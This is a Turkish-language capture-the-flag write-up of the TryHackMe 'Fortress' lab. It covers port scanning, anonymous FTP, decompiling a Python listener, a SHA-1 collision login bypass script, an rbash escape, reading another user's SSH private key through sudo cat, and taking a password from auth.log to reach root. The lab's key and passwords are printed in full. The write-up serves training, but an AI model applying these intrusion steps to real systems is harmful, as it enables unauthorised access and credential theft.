Post

Fortress

Posted Updated
Preview Image
By Umut Sağlam 11 min read

The box contains CTF-based challenges, to-be-solved in a story driven format. The good part is that story is not related to the hints and you can pull this off without reading through the story… So if you want to skip the boring part and dive right into hacking, you can feel free to.

The format of the story is divided into 3 chapters… With each part being revealed as you progress.

Hint: in this room there is no need to brute-force any user credentials.

Fortress

Prepare for battle

etc/hosts dosyasını düzenlememiz istenmiş.

1
2

10.10.87.36   fortress
10.10.87.36   temple.fortress

echo '10.10.87.36 fortress.thm temple.fortress.thm' >> /etc/hosts

Nmap taraması başlatalım.

nmap komutu:

1
2

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.87.36  -p-

nmap sonucu:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
5581/tcp open  ftp     vsftpd 3.0.3
5752/tcp open  unknown
7331/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5752-TCP:V=7.94SVN%I=7%D=5/5%Time=6636EEFC%P=x86_64-pc-linux-gnu%r(
SF:NULL,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20
SF:")%r(GenericLines,32,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\n
SF:Username:\x20Password:\x20")%r(GetRequest,32,"\n\tChapter\x201:\x20A\x2
SF:0Call\x20for\x20help\n\nUsername:\x20Password:\x20")%r(HTTPOptions,32,"
SF:\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20Password:
SF:\x20")%r(RTSPRequest,32,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\
SF:n\nUsername:\x20Password:\x20")%r(RPCCheck,28,"\n\tChapter\x201:\x20A\x
SF:20Call\x20for\x20help\n\nUsername:\x20")%r(DNSVersionBindReqTCP,32,"\n\
SF:tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20Password:\x2
SF:0")%r(DNSStatusRequestTCP,32,"\n\tChapter\x201:\x20A\x20Call\x20for\x20
SF:help\n\nUsername:\x20Password:\x20")%r(Help,32,"\n\tChapter\x201:\x20A\
SF:x20Call\x20for\x20help\n\nUsername:\x20Password:\x20")%r(SSLSessionReq,
SF:28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20")%r(
SF:TerminalServerCookie,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\
SF:n\nUsername:\x20")%r(TLSSessionReq,28,"\n\tChapter\x201:\x20A\x20Call\x
SF:20for\x20help\n\nUsername:\x20")%r(Kerberos,28,"\n\tChapter\x201:\x20A\
SF:x20Call\x20for\x20help\n\nUsername:\x20")%r(SMBProgNeg,28,"\n\tChapter\
SF:x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20")%r(X11Probe,32,"\n\
SF:tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20Password:\x2
SF:0")%r(FourOhFourRequest,32,"\n\tChapter\x201:\x20A\x20Call\x20for\x20he
SF:lp\n\nUsername:\x20Password:\x20")%r(LPDString,32,"\n\tChapter\x201:\x2
SF:0A\x20Call\x20for\x20help\n\nUsername:\x20Password:\x20")%r(LDAPSearchR
SF:eq,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x20")
SF:%r(LDAPBindReq,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUse
SF:rname:\x20")%r(SIPOptions,32,"\n\tChapter\x201:\x20A\x20Call\x20for\x20
SF:help\n\nUsername:\x20Password:\x20")%r(LANDesk-RC,32,"\n\tChapter\x201:
SF:\x20A\x20Call\x20for\x20help\n\nUsername:\x20Password:\x20")%r(Terminal
SF:Server,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsername:\x
SF:20")%r(NCP,28,"\n\tChapter\x201:\x20A\x20Call\x20for\x20help\n\nUsernam
SF:e:\x20");
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.58 seconds

SSH , FTP ve HTTP servisleri çalışıyor.

Önce FTP servisine girmeyi deneyelim.

1
2
3
4
5
6
7
8
9
10
11

┌──(root㉿kali)-[~]
└─# ftp 10.10.87.36 -p 5581                                                                                                        
Connected to 10.10.87.36.
220 (vsFTPd 3.0.3)
Name (10.10.87.36:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Anonymous olarak girebiliyoruz.

ls -la ile bütün dosyaları görüntüleyebiliriz. marked.txt ve .file dosyasını indirelim.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

ftp> ls -la
229 Entering Extended Passive Mode (|||10258|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jul 25  2021 .
drwxr-xr-x    2 ftp      ftp          4096 Jul 25  2021 ..
-rw-r--r--    1 ftp      ftp          1255 Jul 25  2021 .file
-rw-r--r--    1 ftp      ftp           305 Jul 25  2021 marked.txt
226 Directory send OK.
ftp> get .file
local: .file remote: .file
229 Entering Extended Passive Mode (|||33900|)
150 Opening BINARY mode data connection for .file (1255 bytes).
100% |*********************************************************************************************************************************|  1255       14.95 MiB/s    00:00 ETA
226 Transfer complete.
1255 bytes received in 00:00 (14.65 KiB/s)
ftp> get marked.txt
local: marked.txt remote: marked.txt
229 Entering Extended Passive Mode (|||23742|)
150 Opening BINARY mode data connection for marked.txt (305 bytes).
100% |*********************************************************************************************************************************|   305      252.20 KiB/s    00:00 ETA
226 Transfer complete.
305 bytes received in 00:00 (3.51 KiB/s)

marked.txt dosyasında veekay isimli bir kullanıcı olduğunu görüyoruz.

Diğer dosya ise bir python 2.7 byte-compiled dosyası

1
2
3

┌──(root㉿kali)-[~]
└─# file .file             
.file: python 2.7 byte-compiled

Dosyayı çalıştırmayı denediğimde hata veriyor

1
2
3
4
5
6
7
8

┌──(root㉿kali)-[~]
└─# chmod 777 .file         
                                                                                                                                                                                                                                                                                                                                                 
┌──(root㉿kali)-[~]
└─# python2 .file            
Traceback (most recent call last):
  File "../backdoor/backdoor.py", line 5, in <module>
ImportError: No module named Crypto.Util.number

Dosya compile edilmiş, decompile ederek dosyayı okumammız gerekiyor. Bunun için uncompyle2 tool’unu kullanacağım.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/wibiti/uncompyle2.git                                            
Cloning into 'uncompyle2'...
remote: Enumerating objects: 708, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 708 (delta 2), reused 4 (delta 1), pack-reused 700
Receiving objects: 100% (708/708), 941.66 KiB | 2.60 MiB/s, done.
Resolving deltas: 100% (383/383), done.
                                                                                                                                                                              
┌──(root㉿kali)-[/opt]
└─# cd uncompyle2

┌──(root㉿kali)-[/opt/uncompyle2]
└─# python2.7 setup.py install
running install
running build
running build_py
running build_scripts
running install_lib
running install_scripts
changing mode of /usr/local/bin/uncompyle2 to 755
running install_egg_info
Removing /usr/local/lib/python2.7/dist-packages/uncompyle2-1.1.egg-info
Writing /usr/local/lib/python2.7/dist-packages/uncompyle2-1.1.egg-info

┌──(root㉿kali)-[/opt/uncompyle2]
└─# uncompyle2 .file
# 2024.05.05 02:51:08 UTC
#Embedded file name: ../backdoor/backdoor.py
import socket
import subprocess
from Crypto.Util.number import bytes_to_long
usern = 232340432076717036154994L
passw = 10555160959732308261529999676324629831532648692669445488L
port = 5752
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', port))
s.listen(10)

def secret():
    with open('secret.txt', 'r') as f:
        reveal = f.read()
        return reveal


while True:
    try:
        conn, addr = s.accept()
        conn.send('\n\tChapter 1: A Call for help\n\n')
        conn.send('Username: ')
        username = conn.recv(1024).decode('utf-8').strip()
        username = bytes(username, 'utf-8')
        conn.send('Password: ')
        password = conn.recv(1024).decode('utf-8').strip()
        password = bytes(password, 'utf-8')
        if bytes_to_long(username) == usern and bytes_to_long(password) == passw:
            directory = bytes(secret(), 'utf-8')
            conn.send(directory)
            conn.close()
        else:
            conn.send('Errr... Authentication failed\n\n')
            conn.close()
    except:
        continue
+++ okay decompyling .file 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2024.05.05 02:51:08 UTC

username ve password byte_to_long ile şifrelenmiş. long_to_bytes formatına çevirmemiz gerekiyor.

fortress.py dosyası oluşturdum.

Script’i çalıştırdığımda username ve password’ü buluyorum.

Bulduğum username ve password ile telnet’e bağlanıyorum.

1
2
3
4
5
6
7
8
9
10
11
12

┌──(root㉿kali)-[~/Desktop]
└─# telnet 10.10.87.36 5752
Trying 10.10.87.36...
Connected to 10.10.87.36.
Escape character is '^]'.

	Chapter 1: A Call for help

Username: 1337-h4x0r
Password: n3v3r_g0nn4_g1v3_y0u_up
t3mple_0f_y0ur_51n5
Connection closed by foreign host.

Ne işe yarayacağını bilmediğim bir ipucu daha.

Geriye sadece HTTP servisi kaldı.

HTTP servisi 7331 portunda çalışıyor. URL’in sonuna port numarasını girmemiz gerekiyor.

http://fortress.thm:7331/

temple.fortress.thm sitesinde de default apache2 sayfası var.

Gobuster ile dizin taraması yaptım. Hangi wordlist’i verirsem vereyim bir dizin bulamadım.

Telnette bulduğum ipucunun bir dizin ismi olabileceği aklıma geldi.

Sitede sadece siyah ekran var. Kaynak kodunu inceledim.

/assets/style.css dosyasında bir base64 kodu var.

CyberChef sitesinden decode ettim.

Bir şeyi “çarpıştırmaktan” bahsediyor, ne yapacağımı anladıysam arap olayım.

Sitenin kaynak koduna geri döndüm. Dosya .php uzantılı olmasına rağmen kaynak kodunda HTML olması biraz tuhaftı. Dosyanın ismini .html olarak değiştirdim.

Login sayfasına ulaştık, sayfanın kaynak kodunu inceledim.

Kodun yaptığı şey şu: GET parametresi ile user ve pass’ı alıyor. SHA-1 hash’inin aynı olup olmadığını kontrol ediyor, buna hash çarpıştırılması deniyor. Bir şeyleri “çarpıştırmaktan” kasıt buymuş.

SHA-1 çarpışmasını araştırdığımda nasıl yapılabileceğini açıklayan bir yazı buldum.

Yazıyı takip ederek bir python script’i hazırladım.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

import requests

username = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'

username = ''.join(username.split(' '))
password = ''.join(password.split(' '))

usernamestr = ''.join(['%' + username[i] + username[i + 1] for i in range(0, len(username)) if i % 2 == 0])
passwordstr = ''.join(['%' + password[i] + password[i + 1] for i in range(0, len(password)) if i % 2 == 0])

response = requests.get('http://fortress.thm:7331/t3mple_0f_y0ur_51n5.php?user={}&pass={}'.format(usernamestr, passwordstr), proxies={'http':'http://localhost:8080'})

print(response.text)

URL’e gittiğimde yeni bir ipucu görüyorum.

m0td_f0r_j4x0n.txt içerisinde h4rdy kullanıcısının ssh key’i var.

Bir dosya içerisine kaydediyorum ve ssh ile makineye giriyorum.

chmod 600 ile dosyaya gerekli izinleri vermeyi unutmayın.

Fakat hiçbir komut çalıştıramıyoruz.

1
2
3
4
5
6
7

h4rdy@fortress:~$ ls
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
h4rdy@fortress:~$ ls -la
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
h4rdy@fortress:~$ whoami
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
h4rdy@fortress:~$

bash --noprofile komutuyla bu sorunu çözdüm.

1
2

┌──(root㉿kali)-[~/Desktop]
└─# ssh -i rsa h4rdy@10.10.150.71 -t "bash --noprofile"

sudo -l komutu ile h4rdy kullanıcısının, cat’i j4x0n kullanıcısı olarak çalıştırmasına izin verildiğini görebiliriz.

1
2
3
4
5
6
7

h4rdy@fortress:/home$ sudo -l
Matching Defaults entries for h4rdy on fortress:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User h4rdy may run the following commands on fortress:
    (j4x0n) NOPASSWD: /bin/cat

/home/j4x0n/.ssh/ dizininde j4x0n kullanıcısının ssh key’i var. sudo -u j4x0n cat id_rsa komutu ile dosyayı okuyabiliriz.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

h4rdy@fortress:/home$ cd j4x0n/
h4rdy@fortress:/home/j4x0n$ ls -la
total 32
drwxr-xr-x 3 j4x0n j4x0n 4096 Jul 26  2021 .
drwxr-xr-x 5 root  root  4096 Jul 25  2021 ..
lrwxrwxrwx 1 j4x0n j4x0n    9 Jul 26  2021 .bash_history -> /dev/null
-rw-r--r-- 1 j4x0n j4x0n  220 Jul 25  2021 .bash_logout
-rw-r--r-- 1 j4x0n j4x0n 3771 Jul 25  2021 .bashrc
-r--r--r-- 1 root  root   187 Jul 25  2021 endgame.txt
-rw-r--r-- 1 j4x0n j4x0n  655 Jul 25  2021 .profile
drwxr-xr-x 2 j4x0n j4x0n 4096 Jul 25  2021 .ssh
-r-------- 1 j4x0n j4x0n   33 Jul 25  2021 user.txt
h4rdy@fortress:/home/j4x0n$ cd .ssh
h4rdy@fortress:/home/j4x0n/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
h4rdy@fortress:/home/j4x0n/.ssh$ sudo -u j4x0n cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Bir dosya oluşturup key’i kopyaladım ve chmod 600 ile gerekli izinleri verdim.

Artık j4x0n kullanıcısıyla makineye bağlanabiliriz.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

┌──(root㉿kali)-[~/Desktop]
└─# ssh -i id_rsa j4x0n@10.10.150.71             
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

UA Infra: Extended Security Maintenance (ESM) is not enabled.

0 updates can be applied immediately.

39 additional security updates can be applied with UA Infra: ESM
Learn more about enabling UA Infra: ESM service for Ubuntu 16.04 at
https://ubuntu.com/16-04



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jul 26 15:21:48 2021 from 192.168.150.128
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

j4x0n@fortress:~$

Bir sonraki adımımız root kullanıcısına geçmek.

sudo -l komutunu j4x0n kullanıcısında kullanmak için şifre istiyor.

/var/log/auth.log dosyasını okudum ve j4x0n kullanıcısının şifresini buldum.

Jul 26 14:56:18 fortress sudo: j4x0n : TTY=pts/0 ; PWD=/home/j4x0n ; USER=root ; COMMAND=/bin/bash -c echo "j4x0n:yoU_c@nt_guess_1t_in_zillion_years"

Artık sudo -l çalıştırabiliriz.

1
2
3
4
5
6

j4x0n@fortress:/var/log$ sudo -l
Matching Defaults entries for j4x0n on fortress:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User j4x0n may run the following commands on fortress:
    (ALL : ALL) ALL

j4x0n kullanıcısı bütün komutları root olarak çalıştırabiliyor.

sudo bash komutuyla root kullanıcısına geçebiliriz.

TryHackMe
Medium
This post is licensed under CC BY 4.0 by the author.